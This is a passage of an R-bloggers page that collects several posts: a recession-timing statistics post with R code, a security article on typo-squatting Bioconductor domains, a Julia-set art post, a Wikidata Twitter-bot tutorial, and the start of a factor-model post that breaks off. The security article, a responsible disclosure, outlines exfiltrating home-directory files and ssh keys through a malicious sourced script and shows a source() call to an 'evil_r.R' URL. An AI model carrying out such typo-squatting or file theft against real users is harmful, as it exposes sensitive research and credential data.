So let’s consider the latter case, where the financial sector is politically powerful. This is where the Minsky narrative (see [2]) takes hold. He describes a boom-and-bust cycle, but critically, the cause of the bust was built into the boom. After a bust, many in the financial sector “learn their lesson” and become more conservative risk-takers. In this regime the economy recovers and some growth resumes. Over time, the financial sector “forgets” the lessons it learned from the previous bust and begins to take greater risks. Eventually these risks become so great that a greater systematic risk appears and the financial sector, as a whole, stands on shaky ground. Something goes wrong (like the bottom falls out of the housing market or the Russian government defaults), the bets taken by the financial sector go the wrong way, and a crisis ensues. The extra wrinkle in the American financial system is that the financial sector not only isn’t punished for the risks they’ve taken, they get rewarded with a bailout financed by taxpayers and the executives who made those decisions get golden parachutes (although there may be a trivial fine).

If the Minsky narrative is correct, then economic booms do die of “old age”, as eventually the boom is driven by increasingly risky behavior that eventually leads to collapse. When the government is essentially encouraging this behavior with blank-check guarantees, the risks taken grow (risky contracts become lotto tickets paid for by someone else when you lose, but you get all the winnings). Taken together, one can see why there could be some form of memory in the time between recessions. Busts are an essential feature of such an economy.

So what about the Australian economy, as u/must_not_forget_pwd brought up? In short, I think the Australian economy is prototyped by the Canadian economy as described in [1] and thus doesn’t follow the rules driving the boom/bust cycle in America. I think the Australian economy is the Australian economy and the American economy is the American economy. One is stable, the other is not. I’m studying the unstable one, not trying the explain the stability of the other.

Are Other Variables Irrelevant?

First, does time matter to when a recession occurs? The short answer is “Yes, duh!” If you’re going to have any meaningful discussion about when a recession will occur you have to account for the time frame you’re considering. A recession within the next 30 years is much more likely than a recession in the next couple months (if only because one case covers the other, but in general a recession should be more likely to occur within a longer period of time than a shorter one).

But I think the question about “does time matter” is more a question about whether an economy essentially remembers how long it has been since the last recession or not. That’s both an economic and statistical question.

What about other variables? Am I saying that other variables don’t matter when I use only time to predict when the next recession occurs? No, that’s not what I’m saying.

Let’s consider regression equations, often of the form

I think economists are used to thinking about equations like this as essentially causal statements, but that’s not what a regression equation is, and when we estimate a regression equation we are not automatically estimating a function that needs to be interpreted causally. If a regression equation tells us something about causality, that’s great, but that’s not what they do.

Granted, economics students are continuously being reminded the correlation is not causation, but I think many then start to think that we should not compute a regression equation unless the relationship expressed can be interpreted causally. However, knowing that two variables are correlated, and how they are correlated, is often useful.

When we compute a regression function from data, we are computing a function that estimates conditional expectations. This function, when given the value of one variable, tells us what value we can expect for the other variable. That relationship may or may not be due to causality, but the fact that the two variables are not independent of each other can be, in and of itself, a useful fact.

My favorite example in the “correlation is not causation” discussion (probably mentioned first in some econometrics textbook or my econometrics professor) is the relationship between the damage caused by a fire and the number of firefighters at the scene of the fire. Let’s just suppose that we have some data, is the amount of damage in a fire (in thousands of dollars), is the number of firefighters, and we estimated the relationship

There is a positive relationship between the number of firefighters at the scene of the fire and the damage done by the fire. Does this mean that firefighters make fires worse? No, it does not. But if you’re a spectator and you see ten firefighters running the scene of a fire, can you expect the fire to be more damaging than fires where there are five firefighters and not as damaging as fires with fifteen firefighters? Sure, this is reasonable. Not only that, it’s a useful fact to know.

Importantly, when we choose the variables to include in a regression equation, we are deciding what variables we want to use for conditioning. That choice could be motivated by a causal model (because we care about causality), or by model fit (making the smallest error in our predictions while being sufficiently simple), or simply by what’s available. Some models may do better than others at predicting a variable but they all do the same thing: compute conditional expectations.

My point is this: when I use time as the only variable of interest when attempting to predict when a recession occurs, I’m essentially making a prediction based on a model that conditions only on time and nothing else. That’s not the same thing as saying that excluded variables don’t matter. Rather, a variable excluded in the model is effectively treated as being a part of the random soup that generated the data I observe. I’m not conditioning on its values to make predictions. Could my prediction be refined by including that information? Perhaps. But that doesn’t make the prediction automatically useless. In fact, I think we should start with predictions that condition on little to see if conditioning on more variables adds any useful information, generally preferring the simple to the complex given equal predictive value. This is essentially what most -tests automatically reported with statistical software do; they check if the regression model involving possibly multiple parameters does any better than one that only uses the mean of the data to predict values.

I never looked at a model that uses more information than just time, though. I wouldn’t be shocked if using more variables would lead to a better model. But I don’t have that data, and to be completely honest, I don’t want to spend the time to try and get a “great” prediction for when the next recession will occur. My numbers are essentially a back-of-the-envelope calculation. It could be improved, but just because there’s (perhaps significant) room for improvement doesn’t render the calculation useless, and I think I may have evidence that shows the calculation has some merit.

The reddit user had a long discussion about how well the economy would function if predicting the time between recessions only depended on time, that the Federal Reserve would head off every recession and investors would be adjusting their behavior in ways that render the calculation useless. My response is this: I’m not a member of the Fed. I have no investments. My opinion doesn’t matter to the economy. Thus, it’s okay for me to treat the decisions of the Fed, politicians, bank presidents, other investors, and so forth, as part of that random soup producing the economy I’m experiencing, because my opinions do not invalidate the assumptions of the calculation.

There is a sense in which statistics are produced with an audience in mind. I remember Nate Silver making this point in a podcast (don’t ask me which) when discussing former FBI director James Comey’s decision almost days before the 2016 presidential election to announce a reopening of an investigation into Hillary Clinton’s e-mails, which was apparently at least partially driven by the belief that Clinton was very likely to win. Silver said that Comey did not account for the fact that he was a key actor in the process he was trying to predict and that his decisions could change the likelihood of Clinton winning. He invalidated the numbers with his decision based on them. He was not the target audience of the numbers Nate Silver was producing.

I think a similar argument can be made here. If my decisions and beliefs mattered to the economy, then I should account for them in predictions, conditioning on them. But they don’t matter, so I’ve invalidated nothing, and the people who do matter likely are (or should be) reaching conclusions in a much more sophisticated way.

A Second Look at Goodness of Fit

I’m a statistician. Statistics is my hammer. Everything looks like a nail to me. You know why? Because hammering nails is fun.

When I read u/must_not_forget_pwd’s critique, I tried to formulate it in a mathematical way, because that’s what I do. Here’s my best way to describe it in mathematical terms:

  1. The time between recessions are all independent of one another.
  2. Each period of growth follows its own distribution, with its own unique parameters.
  3. The time separating recessions is memoryless. Knowing how long it has been since the last recession tells us nothing about how much longer we have till the next recession.

I wanted a model that one might call “maximum unpredictability”. So if are the times separating recessions, then points 1, 2, and 3 together say that are independent random variables and , and there’s no known relationship between . If this is true, we have no idea when the next recession will occur because there’s no pattern we can extract.

My claim is essentially that , with and there’s only one . If I were to then attempt to formulate these as statistical hypotheses, those hypotheses would be:

Is it possible to decide between these two hypotheses? They’re not nested and it’s not really possible to use the generalized likelihood ratio test because the parameter space that includes both and is too big (you’d have to estimate parameters using data points). That said, they both suggest likelihood functions that, individually, can be maximized, and you might consider using the ratio between these two maximized functions as a test statistic. (Well, actually, the negative log likelihood ratio, which I won’t write down in math or try to explain unless asked, but you can see the end result in the code below in the definition of ts().)

Could that statistic be used to decide between the two hypotheses? I tried searching through literature (in particular, see [3]) and my conclusion is… maybe? To be completely honest, by this point we’ve left the realm of conventional statistics and are now turning into mad scientists, because not only are the hypotheses we’re testing and the statistic we’re using to decide between them just wacky, how the hell are we supposed to know the distribution of this test statistic under the null hypothesis when there are two nuisance parameters that likely aren’t going anywhere? Oh, and while we’re at it, the sample size of the data set of interest is really small, so don’t even think about using asymptotic reasoning!

I think you can see how this descent into madness would end up with me discovering the maximized Monte Carlo test (see [4]) and then writing MCHT to implement it. I’ll try anyting once, so the product of all that sweat and labor is below.

ts <- function(x) { n <- length(x) params <- coef(fitdist(x, "weibull")) k <- params[["shape"]] l <- params[["scale"]] (n * k - n + 1) * log(l) - log(k) + sum(l * (-k) * x^k - k * log(x)) - n } mcsg <- function(x, shape = 2, scale = 1) { x <- qweibull(x, shape = shape, scale = scale) test_stat(x) } brg <- function(x) { n <- length(x) params <- coef(fitdist(x, "weibull")) k <- params[["shape"]] l <- params[["scale"]] rweibull(n, shape = k, scale = l) } mc.mem.test <- MCHTest(ts, mcsg, seed = 123, nuisance_params = c("shape", "scale"), N = 1000, optim_control = list("lower" = c("shape" = 0, "scale" = 0), "upper" = c("shape" = 100, "scale" = 100), "control" = list("max.time" = 60)), threshold_pval = 0.2, localize_functions = TRUE, method = "MMC Test for IID With Memory") b.mem.test <- MCHTest(ts, ts, brg, seed = 123, N = 1000, method = "Bootstrap Test for IID With Memory") b.mem.test(recessions) ## ## Bootstrap Test for IID With Memory ## ## data: recessions ## S = -4601.9, p-value = 0.391 mc.mem.test(recessions) ## Warning in mc.mem.test(recessions): Computed p-value is greater than ## threshold value (0.2); the optimization algorithm may have terminated early ## ## MMC Test for IID With Memory ## ## data: recessions ## S = -4601.9, p-value = 0.962

Both tests failed to reject the null hypothesis. Unfortunately that doesn’t seem to say much. First, it doesn’t show the null hypothesis isn’t correct; it’s just not obviously incorrect. This is always the case, but the bizarre test I’m implementing here is severely underpowered perhaps to the point of being useless. The alternative hypothesis (which I assigned to my “opponent”) is severely disadvantaged.

The conclusion of the above results isn’t in fact that I’m right. Given the severe lack of power of the test, I would say that the results of the test above are essentially inconclusive.

Conclusion

I’m going to be straight with you: if you read this whole article, I probably wasted your time, and for that I am truly sorry.

I suppose you got to enjoy some stream-of-consciousness thoughts about a controversial blog post I wrote where I made a defense that may or may not be convincing, then watched as I developed a strange statistical test that probably didn’t even work to settle a debate with some random guy on reddit, saying he claimed something that honestly he would likely deny and end that imaginary argument inconclusively.

But hey, at least I satisfied my curiosity. And I’m pretty proud of MCHT, which I created to help me write this blog post. Maybe if I hadn’t spent three straight days writing nothing but blog posts, this one would have been better, but the others seemed pretty good. So something good came out of this trip… right?

Maybe I can end like this: do I still think that a recession before the 2020 election is likely? Yes. Do I think that a Weibull describes the time between recessions decently? Conditioning on nothing else, I think so. I still think that my previous work has some merit as a decent back-of-the-envelope calculation. Do I think that the time between recessions has a memory? In short, yes. And while we’re on the topic, I’m not the Fed, so my opinions don’t matter.

All that said, though, smarter people than me may have different opinions and their contributions to this discussion are probably more valuable than mine. For instance, the people at Goldman Sachs believe a recession soon is unlikely; but the people at J.P. Morgan Chase believe a recession could strike in 2020. I’m certainly persuadable on the above points, and as I’ve said before, I think the simple analysis could enhance the narrative advanced by better predictions.

Now that I’ve written this post, we will return to our regular scheduled programming. Thanks for reading! (Please don’t judge me.)

References
  1. C. Calomiris and S. Haber, Fragile by design: the political origins of banking crises and scarce credit (2014), Princeton University Press, Princeton
  2. H. P. Minsky, Stabilizing an unstable economy (1986), Yale University Press, New Haven
  3. D. R. Cox, Tests of separate families of hypotheses, Proc. Fourth Berkeley Symp. on Math. Stat. and Prob., vol. 1 (1961) pp. 105-123
  4. J-M Dufour, Monte Carlo tests with nuisance parameters: A general approach to finite-sample inference and nonstandard asymptotics, Journal of Econometrics, vol. 133 no. 2 (2006) pp. 443-477

Packt Publishing published a book for me entitled Hands-On Data Analysis with NumPy and Pandas, a book based on my video course Unpacking NumPy and Pandas. This book covers the basics of setting up a Python environment for data analysis with Anaconda, using Jupyter notebooks, and using NumPy and pandas. If you are starting out using Python for data analysis or know someone who is, please consider buying my book or at least spreading the word about it. You can buy the book directly or purchase a subscription to Mapt and read it there.

If you like my blog and would like to support it, spread the word (if not get a copy yourself)!

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: R – Curtis Miller's Personal Website. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Hacking Bioconductor

Mon, 11/19/2018 - 11:23

(This article was first published on r – Jumping Rivers, and kindly contributed to R-bloggers)

Introduction

Domain squatting or URL hijacking is a straightforward attack that requires little skill. An attacker registers a domain that is similar to the target domain and hopes that a user accidentally visits the site. For example, if the domain is example.com, then a typo-squatter would register similar domains such as

  • common misspelling: examples.com
  • misspellings based on omitted letters: exampl.com
  • misspellings based on typos: ezample.com
  • a different top-level domain: example.co.uk

The cost of registering a single domain is approximately £10 for two years.

With the rise of data science and the widespread use of tools such as R, Python and Matlab, programming has moved from the domain of computing scientist to users who have no formal training. Coupled with this, is the vast amount of additional free packages available. For example, R has over 12,000 packages on its main repository CRAN. These packages cover everything from clinical trials to machine learning. Installation of these packages does not go through a traditional IT approach, where a user contacts their IT officer asking for packages to be installed. Instead, users simply install the required packages on their own machine. Crucially, to install these packages does not require admin rights. This shift from a centrally managed IT infrastructure to a user-centred approach can be difficult to manage.

We now regularly perform Shiny and R related security health checks. Contact us if you want further details.

Example: Bioconductor project

To make this article concrete, while simultaneously not overstepping the ethical bounds, we used URL hijacking to target Bioconductor. The Bioconductor project provides tools for the analysis and understanding of high-throughput genomic data. The project uses the R programming language and has over 1,300 associated R packages.

To install Bioconductor, users are instructed to run the R script

source("https://bioconductor.org/biocLite.R")

This loads the biocLite() function that enables installation of other R packages. Two points are worth noting:

  • Bioconductor has a large user community.
  • The typical Bioconductor user is analysing cutting-edge biological datasets and therefore likely to be in a University, pharmaceutical company, or government agency. Their data is almost certainly sensitive, which could include patient data or results on upcoming drug trials.

We registered eleven domains: biconductor.org, biocnductor.org, biocoductor.org, biocondctor.org, bioconducor.org, bioconducto.org, bioconductr.org, biocondutor.org, bioconuctor.org, bioonductor.org, boconductor.org

Each domain name is a simple misspelling of bioconductor.

When the source() function is used to access a website, it sends a user agent giving the version of R being used and the operating system. For example, the user agent

R (3.4.2 x86_64-w64-mingw32 x86_64 mingw32)

indicates R version 3.4.2 on a Windows machine. The machine’s location (IP address) is also passed to the server. Whenever a machine accesses a domain, this information is automatically recorded.

For each of the eleven domains, we monitored the server logs for occurrences of the R user-agent. Whenever anyone accessed our rogue domains we always returned a 404 (not found) error message. It is worth noting that while SSL (https) is essential for a secure connection, in this scenario it just provides a secure connection to the rogue domain, i.e. it does not offer any additional protection.

Did it work?

We monitored the eleven domains for five months, starting in January 2018. As expected some domains are clearly more popular than others. The top three domains, bioconducor.org, biconductor.org and biocondutor.org accounted for most of the traffic.

No. of unique hits per day, per domain over the five-month monitoring period. To avoid duplication, a particular IP address is only counted once per day. Only hits that had the R-user agent are counted.

A summary of the results are

  • Thirty-three countries
  • 168 unique Universities, with most of the top 10 Universities in the world represented
  • Many Research Institutes
  • A number of Pharma companies and charities
Is it really a big deal?

Once the user has executed our R script, we are free to run any R commands we wish. If the attacker has targeted users installing Bioconductor then they would probably look for commercially sensitive material.

The first step for an attacker to retrieve information from a user’s machine would be to install the httr R package using the command

install.packages("httr")

This package provides functionality for uploading files to external web-servers. A more nefarious technique would be to detect if Dropbox or other cloud storage system is on their system and leverage that via an associated R package.

The next step would be to determine files on the system. This is particularly easy since R is cross-platform. Using base R, we can list all files under a users home area with

list.files("~/", recursive = TRUE, full.names = TRUE)

An attacker could either upload all files or cherry-pick particular directories, such as those that contain security credentials, e.g. ssh keys. With approximately three lines of standard R code the attacker we could upload all files from a user’s home area to an external server.

An attacker could nuance their attack with little thought. For example, a simple message statement at the start of an attack, such as

The Bioconductor server is experiencing heavy use today; hence the installation process will take slightly longer than usual, please be patient. Sorry for your inconvenience.

would give the attacker more time. A sophisticated variation would be to delay file uploads until the user is away from the computer, while simultaneously installing Bioconductor and allowing the user to proceed as normal.

Detecting an attack would also be difficult as an attacker can modify their response based on the user-agent. For example, if in R we run the command

source("http://www.mas.ncl.ac.uk/~ncsg3/R/evil_r.R")

The server detects an R user agent and returns R code. However visiting the site via a browser, such as Internet Explorer, will result in a “page not found”. An attacker could also cache IP addresses of visitors. This would enable them to launch an attack the first time a user visits the page, but all subsequent visits result in a redirect to the correct Bioconductor site.

Other Attack Avenues

Bioconductor is not the only attack vector that could be exploited. Many R users install the latest versions of packages from GitHub (or other online repositories). The most common method of installing a GitHub package is to use the function install_github(). The first argument of this function is a combination of the GitHub username and the repository name. For example, to install the latest version of ggplot2 package, the user/organisation is tidyverse and the repository name is ggplot2, so the argument to the install_github() function would be tidyverse/ggplot2, i.e. thus

install_github("tidyverse/ggplot2")

As with the mechanism employed by Bioconductor, there is nothing wrong with this particular method for package installation. However like Bioconductor, as there are many users installing the package in this manner, it would be relatively simple to register a similar username; we have actually registered the username tidyversee but didn’t create a ggplot2 repository.

While the tidyverse repository is one of the most popular GitHub repositories, it would be relatively easy to script an attack on all packages hosted in GitHub. Creating similar user-names and cloning the targeted repositories, would create thousands of possible attack vectors.

This security vulnerability is implicitly present whenever a user installs packages or libraries. For example in Python, users can install packages via the popular _pip__ package. However, a malicious attacker can upload a python package to this repository with a similar name to a current package and thereby gain control of a users system via URL hijacking.

Reporting vulnerabilities

We actually discovered this issue mid-way through 2017. After contacting the maintainers of Bioconductor, we waited until the mechanism for installing Bioconductor packages was changed to

## A CRAN package BiocManager::install()

This happened with the release of R 3.5.0. We then waited a few more months just to be sure

Shiny and R Health Checks

One of our main tasks at [Jumping Rivers](https://www.jumpingrivers.com/consultancy/] is to help set up R infrastructure and perform R related security health checks. If you need advice or help, please contact us for further details.

The post Hacking Bioconductor appeared first on Jumping Rivers.

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: r – Jumping Rivers. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Flowers for Julia

Mon, 11/19/2018 - 08:00

(This article was first published on R – Fronkonstin, and kindly contributed to R-bloggers)

No hables de futuro, es una ilusión cuando el Rock & Roll conquistó mi corazón (El Rompeolas, Loquillo y los Trogloditas)

In this post I create flowers inspired in the Julia Sets, a family of fractal sets obtained from complex numbers, after being iterated by a holomorphic function. Despite of the ugly previous definition, the mechanism to create them is quite simple:

  • Take a grid of complex numbers between -2 and 2 (both, real and imaginary parts).
  • Take a function of the form setting parameters and .
  • Iterate the function over the complex numbers several times. In other words: apply the function on each complex. Apply it again on the output and repeat this process a number of times.
  • Calculate the modulus of the resulting number.
  • Represent the initial complex number in a scatter plot where x-axis correspond to the real part and y-axis to the imaginary one. Color the point depending on the modulus of the resulting number after applying the function iteratively.

This image corresponds to a grid of 9 million points and 7 iterations of the function :

To color the points, I pick a random palette from the top list of COLOURLovers site using the colourlovers package. Since each flower involves a huge amount of calculations, I use Reduce to make this process efficiently. More examples:

There are two little Julias in the world whom I would like to dedicate this post. I wish them all the best of the world and I am sure they will discover the beauty of mathematics. These flowers are yours.

The code is available here.

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: R – Fronkonstin. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Tweeting wikidata info

Mon, 11/19/2018 - 01:00

(This article was first published on Category R on Roel's R-tefacts, and kindly contributed to R-bloggers)

In this explainer I walk you through the steps I took to create a twitter bot
that tweets daily about people who died on that date.

I created a script that queries wikidata, takes that information and creates
a sentence. That sentence is then tweeted.

For example:

A tweet I literally just send out from the docker container

I hope you are has excited as I am about this project. Here it comes!

There are 3 parts:

  1. Talk to wikidata and retrieve information about 10 people that died today
  2. Grab one of the deaths and create a sentence
  3. Post that sentence to twitter in the account wikidatabot
  4. Throw it all into a docker container so it can run on the computer of someone else (AKA: THA CLOUD)

You might wonder, why people who died? To which I answer, emphatically but not
really helpfully: ‘valar morghulis’.

1. Talk to wikidata and retrieve information

I think wikidata is one of the coolest knowledge bases in the world, it contains
facts about people, other animals, places, and the world. It powers many boxes
you see in Wikipedia pages. For instance this random page about Charles the first has a box on the
right that says something about his ancestors, successors and coronation.
The same information can be displayed in Dutch.
This is very cool and saves Wikipedia a lot of work. However, we can also use it!

You can create your own query about the world in the query editor. But it is quite hard to figure out how to do that. These queries need to made in
a specific way. I just used an example from wikidata: ‘who’s birthday is it today?’
and modified it to search for people’s death (that’s how I learn, modify
something and see if I broke it). It looks a lot like SQL, but is slightly different.

Of course this editor is nice for us humans, but we want the computer to do it
so we can send a query to wikidata. I was extremely lazy and used the
WikidataQueryServiceR created by wiki-guru Mikhail Popov [@bearlogo](https://twitter.com/bearloga).

This is the query I ended up using (It looks very much like the birthdays one
but with added information):

querystring <- 'SELECT # what variables do you want to return (defined later on) ?entityLabel (YEAR(?date) AS ?year) ?cause_of_deathLabel ?place_of_deathLabel ?manner_of_deathLabel ?country_of_citizenshipLabel ?country_of_birth ?date_of_birth WHERE { BIND(MONTH(NOW()) AS ?nowMonth) # this is a very cool trick BIND(DAY(NOW()) AS ?nowDay) ?entity wdt:P570 ?date. SERVICE wikibase:label { bd:serviceParam wikibase:language "en". } ?entity wdt:P509 ?cause_of_death. OPTIONAL { ?entity wdt:P20 ?place_of_death. } OPTIONAL { ?entity wdt:P1196 ?manner_of_death. } FILTER(((MONTH(?date)) = ?nowMonth) && ((DAY(?date)) = ?nowDay)) OPTIONAL { ?entity wdt:P27 ?country_of_citizenship. } OPTIONAL { ?entity wdt:p19 ?country_of_birth} OPTIONAL { ?entity wdt:P569 ?date_of_birth.} } LIMIT 10'

Try this in the query editor

When I created this blog post (every day the result will be different)
the result looked like this:

library(WikidataQueryServiceR) result <- query_wikidata(querystring) ## 10 rows were returned by WDQS result[1:3,1:3]# first 3 rows, first 3 columsn ## entityLabel year cause_of_deathLabel ## 1 Rafael García-Plata y Osma 1918 influenza ## 2 Dobroslava Menclová 1978 traffic crash ## 3 Alan J. Pakula 1998 traffic crash

The query returns name, year, cause of death, manner of death
(didn’t know which one to use), place of death, country of citizenship, country
of birth and date of birth.
I can now glue all these parts together to create a sentence of sorts

2. grab one of the deaths and create a sentence

I will use glue to make text, but the paste functions from base R is also fine.

These are the first lines for instance:

library(glue) glue_data(result[1:2,], "Today in {year} in the place {place_of_deathLabel} died {entityLabel} with cause: {cause_of_deathLabel}. {entityLabel} was born on {as.Date(date_of_birth, '%Y-%m-%d')}. Find more info on this cause of death on www.en.wikipedia.org/wiki/{cause_of_deathLabel}. #wikidata") ## Today in 1918 in the place Cáceres died Rafael García-Plata y Osma with cause: influenza. Rafael García-Plata y Osma was born on 1870-03-04. Find more info on this cause of death on www.en.wikipedia.org/wiki/influenza. #wikidata ## Today in 1978 in the place Plzeň died Dobroslava Menclová with cause: traffic crash. Dobroslava Menclová was born on 1904-01-02. Find more info on this cause of death on www.en.wikipedia.org/wiki/traffic crash. #wikidata Post that sentence to twitter in the account wikidatabot

I created the twitter account wikidatabot and
added pictures 2fa and some bio information. I wanted to make it clear that it
was a bot. To post something on your behalf on twitter requires a developers
account. Go to https://developer.twitter.com and create that account. In my case
I had to manually verify twice because apparently everything I did screamed bot activity
to twitter (they were not entirely wrong). You have to sign some boxes,
acknowledge the code of conduct and understand twitter’s terms.

The next step is to create a twitter app but I will leave that explanation to
rtweet, because that vignette is very
very helpful.

When you’re done, you can post to twitter on your account with the help of
a consumer key, access key, consumer token and access token. You will need them
all and you will have to keep them a secret (or other people can post on your
account, and that is something you really don’t want).

With those secrets and the rtweet package you can create a token that enables
you to post to twitter.

And it is seriously as easy as:

rtweet::post_tweet(status = tweettext, token = token )

Again the same tweet

4 Throw it all into a docker container

I want to post this every day but to make it run in the cloud it would be nice
if R and the code would be nicely packed together. That is where docker comes in,
you can define what packages you want and a mini operating system is created
that will run for everyone on ever computer (if they have docker).
The whole example script and docker file can be found here on github.

And that’s it. If you have suggestions on how to run it every day in the cloud
for cheap, let me know by twitter or by opening an issue on github.

Things that could be done better:
  • I can run the container, but I don’t know how to make it run in the cloud
  • I ask for 10 deaths and pick one randomly, I don’t know if there is a random function in sparql
  • I put the (twitter) keys into the script, it would be better to use environment variables for that
  • rtweet and WikidataQueryServiceR have lots of dependencies that make the docker container difficult to build (mostly time consuming)
  • I guess I could just build the query and post to wikidata, but using WikidataQueryServiceR was much faster
  • I wish I knew how to use the rocker:tidyverse container to run a script, but I haven’t figured that out yet
State of the machine

At the moment of creation (when I knitted this document ) this was the state of my machine: click here to expand

sessioninfo::session_info() ## ─ Session info ────────────────────────────────────────────────────────── ## setting value ## version R version 3.5.1 (2018-07-02) ## os Ubuntu 16.04.5 LTS ## system x86_64, linux-gnu ## ui X11 ## language en_US ## collate en_US.UTF-8 ## tz Europe/Amsterdam ## date 2018-11-19 ## ## ─ Packages ────────────────────────────────────────────────────────────── ## package * version date source ## backports 1.1.2 2017-12-13 CRAN (R 3.5.0) ## blogdown 0.8 2018-07-15 CRAN (R 3.5.1) ## bookdown 0.7 2018-02-18 CRAN (R 3.5.0) ## clisymbols 1.2.0 2017-05-21 CRAN (R 3.5.0) ## crayon 1.3.4 2017-09-16 CRAN (R 3.5.0) ## curl 3.2 2018-03-28 CRAN (R 3.5.0) ## digest 0.6.15 2018-01-28 CRAN (R 3.5.0) ## evaluate 0.11 2018-07-17 CRAN (R 3.5.1) ## glue * 1.3.0 2018-07-17 CRAN (R 3.5.1) ## htmltools 0.3.6 2017-04-28 CRAN (R 3.5.0) ## httr 1.3.1 2017-08-20 CRAN (R 3.5.0) ## knitr 1.20 2018-02-20 CRAN (R 3.5.0) ## magrittr 1.5 2014-11-22 CRAN (R 3.5.0) ## R6 2.2.2 2017-06-17 CRAN (R 3.5.0) ## Rcpp 0.12.18 2018-07-23 cran (@0.12.18) ## rmarkdown 1.10 2018-06-11 CRAN (R 3.5.0) ## rprojroot 1.3-2 2018-01-03 CRAN (R 3.5.0) ## sessioninfo 1.0.0 2017-06-21 CRAN (R 3.5.1) ## stringi 1.2.4 2018-07-20 cran (@1.2.4) ## stringr 1.3.1 2018-05-10 CRAN (R 3.5.0) ## WikidataQueryServiceR * 0.1.1 2017-04-28 CRAN (R 3.5.1) ## withr 2.1.2 2018-03-15 CRAN (R 3.5.0) ## xfun 0.3 2018-07-06 CRAN (R 3.5.1) ## yaml 2.2.0 2018-07-25 CRAN (R 3.5.1) var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: Category R on Roel's R-tefacts. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Many Factor Models

Mon, 11/19/2018 - 01:00

(This article was first published on R Views, and kindly contributed to R-bloggers)

Today, we will return to the Fama French (FF) model of asset returns and use it as a proxy for fitting and evaluating multiple linear models. In a previous post, we reviewed how to run the FF three-factor model on the returns of a portfolio. That is, we ran one model on one set of returns. Today, we will run multiple models on multiple streams of returns, which will allow us to compare those models and hopefully build a code scaffolding that can be used when we wish to explore other factor models.

Let’s get to it!

We will start by importing daily prices and calculating the returns of our five usual ETFs: SPY, EFA, IJS, EEM and AGG. I covered the logic for this task in a previous post and the code is below.

library(tidyverse) library(broom) library(tidyquant) library(timetk) symbols <- c("SPY", "EFA", "IJS", "EEM", "AGG") # The prices object will hold our daily price data. prices <- getSymbols(symbols, src = 'yahoo', from = "2012-12-31", to = "2017-12-31", auto.assign = TRUE, warnings = FALSE) %>% map(~Ad(get(.))) %>% reduce(merge) %>% `colnames<-`(symbols) asset_returns_long <- prices %>% tk_tbl(preserve_index = TRUE, rename_index = "date") %>% gather(asset, returns, -date) %>% group_by(asset) %>% mutate(returns = (log(returns) - log(lag(returns)))) %>% na.omit() asset_returns_long %>% head() # A tibble: 6 x 3 # Groups: asset [1] date asset returns 1 2013-01-02 SPY 0.0253 2 2013-01-03 SPY -0.00226 3 2013-01-04 SPY 0.00438 4 2013-01-07 SPY -0.00274 5 2013-01-08 SPY -0.00288 6 2013-01-09 SPY 0.00254

We now have the returns of our five ETFs saved in a tidy tibble called asset_returns_long. Normally we would combine these into one portfolio, but we will leave them as individual assets today so we can explore how to model the returns of multiple assets saved in one data object.

We are going to model those individual assets on the Fama French set of five factors to see if those factors explain our asset returns. Those five factors are the market returns (similar to CAPM), firm size (small versus big), firm value (high versus low book-to-market), firm profitability (high versus low operating profits), and firm investment (high versus low total asset growth). To learn more about the theory behind using these factors, see this article.

Our next step is to import our factor data, and luckily FF make them available on their website. I presented the code showing how to import this data in a previous post on my blog so I won’t go through the steps again, but the code is below.

